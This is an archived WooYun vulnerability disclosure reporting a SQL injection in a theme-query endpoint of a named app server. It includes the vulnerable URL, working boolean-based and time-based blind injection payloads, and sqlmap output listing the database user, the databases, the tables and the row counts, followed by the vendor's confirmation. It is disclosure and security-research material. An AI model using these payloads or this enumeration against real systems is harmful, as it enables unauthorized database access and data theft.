WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2016-03-29: Details reported to the vendor; awaiting vendor handling
2016-03-30: Vendor confirmed; details disclosed to the vendor only
2016-04-09: Details disclosed to core white hats and relevant domain experts
2016-04-19: Details disclosed to regular white hats
2016-04-29: Details disclosed to intern white hats
2016-05-14: Details disclosed to the public
As stated in the title.
http://esaytouch.app.jj.cn:8080/data/zip/page/querylanguagethemes?package_name=com.shere.assistivetouch&sort=-1&begin=-1&version_code=40506&language=cn&channel=xiaomi
Parameter: package_name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: package_name=com.shere.assistivetouch' AND 9422=9422 AND 'iYFY'='iYFY&version_code=40506&language=cn&channel=xiaomi

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: package_name=com.shere.assistivetouch' OR (SELECT * FROM (SELECT(SLEEP(5)))guFc) AND 'sUVQ'='sUVQ&version_code=40506&language=cn&channel=xiaomi

database management system users [1]:
[*] 'shere1'@'%'

web application technology: Nginx
back-end DBMS: MySQL 5.0.12

available databases [3]:
[*] information_schema
[*] shere8
[*] test

Database: shere8
[21 tables]
+----------------------+
| user                 |
| version              |
| advertisement        |
| app_update           |
| blacklist            |
| channel              |
| channel_theme        |
| country              |
| exchange_code        |
| feedback             |
| market_auditing      |
| message              |
| platform             |
| theme                |
| theme_control_center |
| theme_country        |
| theme_evo            |
| theme_platform       |
| theme_sort           |
| theme_zip2           |
| theme_zip3           |
+----------------------+

+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| theme_country        | 103422  |
| channel_theme        | 3343    |
| theme_zip3           | 429     |
| theme                | 251     |
| country              | 247     |
| exchange_code        | 138     |
| theme_zip2           | 134     |
| message              | 95      |
| theme_platform       | 81      |
| market_auditing      | 60      |
| theme_evo            | 26      |
| channel              | 10      |
| theme_sort           | 9       |
| feedback             | 8       |
| theme_control_center | 7       |
| advertisement        | 3       |
| platform             | 3       |
| `version`            | 1       |
+----------------------+---------+
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2016-03-30 08:51
The relevant technical staff have been notified to handle it; thank you very much for the information you provided.
None yet.